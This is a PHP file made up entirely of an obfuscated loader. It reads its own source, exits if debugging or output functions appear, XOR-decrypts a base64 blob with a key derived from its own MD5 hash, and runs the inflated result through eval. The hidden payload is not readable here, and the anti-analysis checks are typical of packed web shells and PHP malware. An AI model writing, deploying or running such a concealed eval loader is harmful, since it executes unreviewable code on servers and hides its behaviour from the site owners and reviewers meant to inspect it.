<?php
$jxptuwgoxugh="913ab066db2645f2f0150f48a0a8f026";
$qahqqvp="5b5550005452050502530755065607565f09530c5650020e5005565955085152";
$wtnqjyaaxa="/yuya/RSP8/zDSGxuxd+VF12bL2fMXQuap+yDxilMCWUi8VB8wUscaRsRxRjbKarygVSJSa7n+EElUCqLhMz7Q74LIXWgOe+ynLRSHdt349gWhvoAJF86jJ/JlSUziswdgRjKg2lRhfyaFB08y7ZYShOdI1zW9ShiRgN+vrNeLi2nzaXBTjyNYomy4LM7fW6wp+6Bw==";
$ekuzskrdl=file_get_contents(__FILE__);
$dcffiytir=str_replace($wtnqjyaaxa,"",$ekuzskrdl);
if(strpos($dcffiytir,"ec"."ho")!==false||strpos($dcffiytir,"pr"."int")!==false||strpos($dcffiytir,"var_"."dump")!==false||strpos($dcffiytir,"file_put_"."contents")!==false||strpos($dcffiytir,"fw"."rite")!==false){die();}
$nsckyi=str_replace(array($jxptuwgoxugh,$qahqqvp),array("SP_6b6ac6a2","KP_fd7c8176"),$ekuzskrdl);
$mfmjvdrl=md5($nsckyi);
$hmowmkxj=hex2bin($qahqqvp);
$lphvcy="";
$eievtskv=strlen($mfmjvdrl);
for($vsoutjazqir=0;$vsoutjazqir<$eievtskv;$vsoutjazqir++){
    $lphvcy.=chr(ord($hmowmkxj[$vsoutjazqir])^ord($mfmjvdrl[$vsoutjazqir]));
}
$zeunbcpqs=base64_decode($wtnqjyaaxa);
$xmxqmzpmcdx=strlen($zeunbcpqs);
$eienjwndiylb="";
$oesrvhbfhdv=strlen($lphvcy);
for($vsoutjazqir=0;$vsoutjazqir<$xmxqmzpmcdx;$vsoutjazqir++){
    $eienjwndiylb.=$zeunbcpqs[$vsoutjazqir]^$lphvcy[$vsoutjazqir%$oesrvhbfhdv];
}
$ubokah="gz"."in"."fl"."ate";
eval($ubokah($eienjwndiylb));
